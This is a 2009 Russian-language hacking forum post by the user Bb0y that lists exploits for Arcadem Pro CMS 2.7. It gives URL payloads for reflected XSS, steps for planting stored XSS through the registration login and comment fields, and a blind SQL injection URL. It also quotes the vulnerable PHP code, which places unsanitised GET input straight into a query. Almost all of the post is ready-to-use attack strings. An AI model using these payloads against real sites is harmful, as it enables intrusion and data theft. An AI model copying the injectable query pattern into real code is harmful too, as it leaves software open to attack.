Показать сообщение отдельно

  #6  
Старый 20.12.2009, 00:14
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
По умолчанию

Arcadem Pro CMS [2.7]
xss пассивная:
[localhost]/index.php?cat="><script>alert();</script>
xss пассивная:
[localhost]/index.php?article="><script>alert();</script>
xss активная:
При регистрации, в поле "Логин" вписываем
Цитата:
"><script>alert();</script>
, регистрирумся. При просмотре игроков, статистики и т.д. будет выполняться ваш код.
xss активная:
[localhost]/index.php?loadpage=./includes/articleblock.php&articlecat=[number]
в строке поле комментария вводим
Цитата:
"><script>alert();</script>
и отправляем. При просмотре комментариев выполнится ваш код.
Blind SQL injection:
[localhost]/index.php?article=[number]+and+ascii(substring(version(),19,1))+--+Bb0y
уязвимый код:
PHP код:
$articleid $_GET['article'];

if (
is_numeric(intval($articleid)) == TRUE) {
   
$sql "SELECT * FROM AMCMS_articles WHERE articlekey=$articleid LIMIT 1;"

Последний раз редактировалось Bb0y; 20.12.2009 в 00:17..
 
Ответить с цитированием